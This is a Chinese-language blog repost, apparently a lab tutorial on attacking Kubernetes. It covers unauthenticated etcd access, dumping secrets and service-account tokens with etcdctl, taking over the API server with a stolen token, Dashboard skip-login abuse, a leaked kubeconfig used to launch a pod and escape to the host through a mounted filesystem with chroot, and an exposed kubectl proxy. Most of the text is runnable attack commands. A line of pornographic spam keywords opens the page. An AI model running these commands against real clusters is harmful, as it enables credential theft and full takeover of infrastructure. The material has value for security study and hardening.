国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露

這篇具有很好參考價值的文章主要介紹了云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全

云原生-K8s安全-etcd未授權(quán)訪問

如上圖所示:etcd服務(wù)是運行在master節(jié)點上的,master節(jié)點上查看該服務(wù)默認通過證書認證,主要存放節(jié)點的數(shù)據(jù),如一些token和證書。
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全當然,初始安全情況下,該服務(wù)是安全的(2379不對外開放,本地可訪問),下面三種主要是配置問題

三種攻擊2379端口方式

配置文件:/etc/kubernetes/manifests/etcd.yaml

云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全注釋掉或者改為false,重啟k8s服務(wù)

systemctl restart kubelet.service 

V2版本利用:
直接訪問http://ip:2379/v2/keys/?recursive=true ,
可以看到所有的key-value值。(secrets token)
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全如圖表示對方api版本是V3版本,目前V2版本已經(jīng)很少見了
使用etcd-v3.4.27工具進行連接利用

第一種:沒有配置指定–client-cert-auth 參數(shù)打開證書校驗,暴露在外Etcd服務(wù)存在未授權(quán)訪問風險。
-暴露外部可以訪問,直接未授權(quán)訪問獲取secrets和token利用
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全直接使用工具進行連接報錯,因為從上方web訪問可以看出是需要https證書
復(fù)現(xiàn)搭建:
https://www.cnblogs.com/qtzd/p/k8s_etcd.html
安裝etcdctl:
https://github.com/etcd-io/etcd/releases
安裝kubectl:https://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全
第二種:在打開證書校驗選項后,通過本地127.0.0.1:2379可免認證訪問Etcd服務(wù),但通過其他地址訪問要攜帶cert進行認證訪問,一般配合ssrf或其他利用,較為雞肋。
-只能本地訪問,直接未授權(quán)訪問獲取secrets和token利用

第三種:實戰(zhàn)中在安裝k8s默認的配置2379只會監(jiān)聽本地,如果訪問沒設(shè)置0.0.0.0暴露,那么也就意味著最多就是本地訪問,不能公網(wǎng)訪問,只能配合ssrf或其他。
-只能本地訪問,利用ssrf或其他進行獲取secrets和token利用

*復(fù)現(xiàn)利用:
*暴露etcd未授權(quán)->獲取secrets&token->通過token訪問API-Server接管
*SSRF解決限制訪問->獲取secrets&token->通過token訪問API-Server接管
*V2/V3版本利用參考:https://www.cnblogs.com/qtzd/p/k8s_etcd.html

利用參考:
https://www.wangan.com/p/7fy7f81f02d9563a
https://www.cnblogs.com/qtzd/p/k8s_etcd.html

V3版本利用:
1、連接提交測試

./etcdctl --endpoints=192.168.139.136:23791 get / --prefix
./etcdctl --endpoints=192.168.139.136:23791 put /testdir/testkey1 “Hello world1”
./etcdctl --endpoints=192.168.139.136:23791 put /testdir/testkey2 “Hello world2”
./etcdctl --endpoints=192.168.139.136:23791 put /testdir/testkey3 “Hello world3”

2、獲取k8s的secrets:

./etcdctl --endpoints=192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/

3、讀取service account token:

./etcdctl --endpoints=192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole
./etcdctl --endpoints=192.168.139.136:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z

4、通過token訪問API-Server,獲取集群的權(quán)限:

kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token=“ey…” -n kube-system get pods

云原生-K8s安全-Dashboard未授權(quán)訪問

默認端口:8001
配置不當導(dǎo)致dashboard未授權(quán)訪問,通過dashboard我們可以控制整個集群。
kubernetes dashboard的未授權(quán)其實分兩種情況:
一種是在本身就存在著不需要登錄的http接口,但接口本身并不會暴露出來,如接口被暴露在外,就會導(dǎo)致dashboard未授權(quán)。另外一種情況則是開發(fā)嫌登錄麻煩,修改了配置文件,使得安全接口https的dashboard頁面可以跳過登錄。

*復(fù)現(xiàn)利用:
*用戶開啟enable-skip-login時可以在登錄界面點擊跳過登錄進dashboard
*Kubernetes-dashboard綁定cluster-admin(擁有管理集群的最高權(quán)限)
1、安裝:https://blog.csdn.net/justlpf/article/details/130718774
2、啟動:kubectl create -f recommended.yaml
3、卸載:kubectl delete -f recommended.yaml
4、查看:kubectl get pod,svc -n kubernetes-dashboard
5、利用:新增Pod后續(xù)同前面利用一致
搭建環(huán)境太麻煩了
正常情況下Dashboard如圖:
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全有漏洞的情況下:(沒搭建出來……)
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全
點擊跳過直接進入控制面板
云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全利用流程:找到暴露面板->dashboard跳過-創(chuàng)建或上傳pod->進入pod執(zhí)行-利用掛載逃逸

云原生-K8s安全-Configfile鑒權(quán)文件泄漏

攻擊者通過Webshell、Github等拿到了K8s配置的Config文件,操作集群,從而接管所有容器。K8s configfile作為K8s集群的管理憑證,其中包含有關(guān)K8s集群的詳細信息(API Server、登錄憑證)。如果攻擊者能夠訪問到此文件(如辦公網(wǎng)員工機器入侵、泄露到Github的代碼等),就可以直接通過API Server接管K8s集群,帶來風險隱患。用戶憑證保存在kubeconfig文件中,通過以下順序來找到kubeconfig文件:
-如果提供了–kubeconfig參數(shù),就使用提供的kubeconfig文件
-如果沒有提供–kubeconfig參數(shù),但設(shè)置了環(huán)境變量$KUBECONFIG,則使用該環(huán)境變量提供的kubeconfig文件
-如果以上兩種情況都沒有,kubectl就使用默認的kubeconfig文件~/.kube/config

*復(fù)現(xiàn)利用:
*K8s-configfile->創(chuàng)建Pod/掛載主機路徑->Kubectl進入容器->利用掛載逃逸
1、將獲取到的config復(fù)制
2、安裝kubectl使用config連接
安裝:https://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux
連接:kubectl -s https://192.168.139.130:6443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes
3、上傳利用test.yaml創(chuàng)建pod

kubectl apply -f test.yaml -n default --kubeconfig=config

4、連接pod后進行容器掛載逃逸

kubectl exec -it xiaodisec bash -n default --kubeconfig=config 
cd /mnt
chroot . bash

云原生-K8s安全-Kubectl Proxy不安全配置

當運維人員需要某個環(huán)境暴露端口或者IP時,會用到Kubectl Proxy
使用kubectl proxy命令就可以使API server監(jiān)聽在本地的xxxx端口上
環(huán)境搭建:

kubectl --insecure-skip-tls-verify proxy --accept-hosts=^.*$ --address=0.0.0.0 --port=8009

*復(fù)現(xiàn)利用:
*類似某個不需認證的服務(wù)應(yīng)用只能本地訪問被代理出去后形成了外部攻擊入口點。
*找到暴露入口點,根據(jù)類型選擇合適方案

kubectl -s http://10.10.10.167:8009 get pods -n kube-system

云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露,Cyber-Security,云原生,kubernetes,安全文章來源地址http://www.zghlxwxcb.cn/news/detail-721647.html

到了這里,關(guān)于云上攻防-云原生篇&K8s安全&Config泄漏&Etcd存儲&Dashboard鑒權(quán)&Proxy暴露的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 云原生Kubernetes:K8S安全機制

    云原生Kubernetes:K8S安全機制

    目錄 一、理論 1.K8S安全機制 2.Authentication認證 3.Authorization授權(quán) 4.Admission Control準入控制 5.User訪問案例 6.ServiceAccount訪問案例 二、實驗 1.Admission Control準入控制 2.User訪問案例 3.ServiceAccount訪問案例 三、問題 1.生成資源報錯 2.鏡像拉取失敗 四、總結(jié) (1)概念 Kubernetes 作為一個分

    2024年02月07日
    瀏覽(26)
  • 云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測&容器逃逸&特權(quán)模式&危險掛載

    云上攻防-云原生篇&Docker安全&權(quán)限環(huán)境檢測&容器逃逸&特權(quán)模式&危險掛載

    Docker 是一個開放源代碼軟件,是一個開放平臺,用于開發(fā)應(yīng)用、交付(shipping)應(yīng)用、運行應(yīng)用。Docker允許用戶將基礎(chǔ)設(shè)施(Infrastructure)中的應(yīng)用單獨分割出來,形成更小的顆粒(容器),從而提高交付軟件的速度。 Docker 容器與虛擬機類似,但二者在原理上不同,容器是將

    2024年02月07日
    瀏覽(20)
  • 云上攻防-云原生篇&Docker安全&系統(tǒng)內(nèi)核&版本漏洞&CDK自動利用&容器逃逸

    云上攻防-云原生篇&Docker安全&系統(tǒng)內(nèi)核&版本漏洞&CDK自動利用&容器逃逸

    細節(jié)部分在權(quán)限提升章節(jié)會詳解,常用: CVE-2016-5195 CVE-2019-16884 CVE-2021-3493 CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222 Docker version = 18.09.2 RunC version = 1.0-rc6 1、安裝docker對應(yīng)版本 2、啟動環(huán)境測試: 3、編譯修改后EXP后等待管理進入執(zhí)行 https://github.com/Frichetten/CVE-2019-5736-PoC 還有

    2024年02月08日
    瀏覽(40)
  • k8s etcd 簡介

    k8s etcd 簡介

    Etcd是CoreOS基于Raft協(xié)議開發(fā)的分布式key-value存儲,可用于服務(wù)發(fā)現(xiàn)、共享配置以及一致性保障(如數(shù)據(jù)庫選主、分布式鎖等)。 如,Etcd也可以作為微服務(wù)的注冊中心,比如SpringCloud也基于ETCD實現(xiàn)了注冊中心功能,可以替代earka,具體參考:Spring Cloud Etcd 在分布式系統(tǒng)中,如何

    2024年02月10日
    瀏覽(24)
  • k8s之etcd

    k8s之etcd

    ????????etcd 是云原生架構(gòu)中重要的基礎(chǔ)組件。有如下特點: 簡單:安裝配置簡單,而且提供了 HTTP API 進行交互,使用也很簡單 鍵值對存儲:將數(shù)據(jù)存儲在分層組織的目錄中,如同在標準文件系統(tǒng)中 監(jiān)測變更:監(jiān)測特定的鍵或目錄以進行更改,并對值的更改做出反應(yīng) 安

    2024年04月24日
    瀏覽(21)
  • 37.云原生之springcloud+k8s+GitOps+istio+安全實踐

    37.云原生之springcloud+k8s+GitOps+istio+安全實踐

    云原生專欄大綱 安裝gitlab,將https://gitee.com/zhouwei1996/spring-cloud-bookinfo.git遷移至gitlab gitlab中創(chuàng)建全局變量,如鏡像倉庫賬號密碼,保證gitlab-ci.yaml中內(nèi)容安全 共享runner創(chuàng)建,獲取token如下:glrt-wfzAecJmszsZb3GorS8J 安裝gitlab-runner,參考:22.云原生之GitLab CICD實戰(zhàn)及解析 修改ConfigM

    2024年03月22日
    瀏覽(23)
  • k8s中部署etcd集群

    ? ? ? ? Etcd是一個高可用的 、 開源的、分布式的Key/value存儲系統(tǒng) , 提供共享配置、服務(wù)的注冊和發(fā)現(xiàn)、數(shù)據(jù)TTL失效、數(shù)據(jù)改變監(jiān)視、多值、目錄監(jiān)聽、分布式原子鎖操作等功能 。 通常,k8s使用etcd進行數(shù)據(jù)存儲,本文將部署etcd集群用做應(yīng)用的存儲。 一、前提 ? ? ? ? 部

    2024年02月08日
    瀏覽(23)
  • 【K8S系列】深入解析etcd

    【K8S系列】深入解析etcd

    時間永遠是旁觀者,所有的過程和結(jié)果,都需要我們自己去承擔。 文章標記顏色說明: 黃色 :重要標題 紅色 :用來標記結(jié)論 綠色 :用來標記一級論點 藍色 :用來標記二級論點 Kubernetes (k8s) 是一個容器編排平臺,允許在容器中運行應(yīng)用程序和服務(wù)。今天學習一下etcd。 希

    2023年04月17日
    瀏覽(21)
  • K8s 內(nèi)存泄漏處理方法

    K8s 內(nèi)存泄漏處理方法

    問題描述: 產(chǎn)生的所有文件如下: runc Kubelet 替換前的文件 檢查kmem是否關(guān)閉前需要將此節(jié)點的pod殺掉重啟或者重啟服務(wù)器,當結(jié)果為0時成功 [root@k8s-master ~]# cat /sys/fs/cgroup/memory/kubepods/burstable/memory.kmem.usage_in_bytes [root@k8s-master ~]# cat /sys/fs/cgroup/memory/kubepods/memory.kmem.slabinfo 12. 經(jīng)

    2024年02月13日
    瀏覽(23)
  • 【云原生-K8s】檢查yaml文件安全配置kubesec部署及使用

    【云原生-K8s】檢查yaml文件安全配置kubesec部署及使用

    基礎(chǔ)描述 Kubesec 是一個開源項目,旨在為 Kubernetes 提供安全特性。它提供了一組工具和插件,用于保護和管理在 Kubernetes 集群中的工作負載和基礎(chǔ)設(shè)施。Kubesec 的目標是幫助開發(fā)人員和運維人員在 Kubernetes 環(huán)境中實現(xiàn)安全性、可靠性和合規(guī)性。 特點 自動化的安全策略:Kubes

    2024年02月05日
    瀏覽(94)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包